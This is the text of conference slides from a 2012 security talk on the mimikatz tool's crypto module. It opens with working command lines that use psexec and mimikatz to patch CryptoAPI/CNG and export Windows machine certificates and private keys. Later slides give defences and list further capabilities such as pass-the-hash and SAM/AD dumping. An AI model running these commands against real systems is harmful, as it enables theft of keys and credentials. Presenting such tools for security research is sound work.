psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password :– PFX files are protected by this password : mimikatz

Keys– When you import multiple time a certificate, exportable or not, Windows make duplicate keys– When you delete a certificate, Windows does not delete its private key… funny isn’t it ?

• So yes, mimikatz can export it

07/11/2012


mimikatz :: cryptowhat we can do ?

Exactly the same as for sekurlsa, it will prevent access to accounts / computer !– no admin, no admin, no admin…

Basics– Use smartcards/token for users certificates– Use Hardware Security Modules (HSM), even SoftHSM

More in depth– See what Microsoft can do with TPM from Windows 8

• Virtual SmartCard seems promising

– Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP• Their biometrics stuff was a little buggy ;)

07/11/2012


mimikatzwhat else can it do ?

Play with minesweeperManipulate some handlesPass the hashDump SAM / ADStop event monitoringPatch Terminal ServerBasic GPO bypassApplocker / SRP bypassDriver

– Play with tokens & privileges– Display SSDT x86 & x64– List minifilters actions– List Notifications (process / thread / image / registry)– List Objects hooks and procedures– …

…

07/11/2012


mimikatzthat’s all folks !

Thanks’ to / Merci à :

– my girlfriend for her support (her LSASS crashed few times)– Application Security Forum to offer me this great opportunity

• Partners and Sponsors for sure !

– Microsoft to always consider it as normal/acceptable – Security friends/community for their ideas & challenges

• nagual, newsoft, mubix, …

– You, for your attention !

Questions ?

Don’t be shy ;)especially if you have written the corresponding slide number

07/11/2012


Blog, Source Code & Contact

blog http://blog.gentilkiwi.commimikatz http://blog.gentilkiwi.com/mimikatzsource https://code.google.com/p/mimikatz/email [email protected]

07/11/2012

http://blog.gentilkiwi.com/

http://blog.gentilkiwi.com/

http://blog.gentilkiwi.com/mimikatz

http://blog.gentilkiwi.com/mimikatz

https://code.google.com/p/mimikatz/

https://code.google.com/p/mimikatz/

mailto:[email protected]

mimikatz @ asfws

Technology

return of mimikatz

code mimikatz

secacl mimikatz

memory mod

service mod

principle of pass

sekurlsa history of

thread mod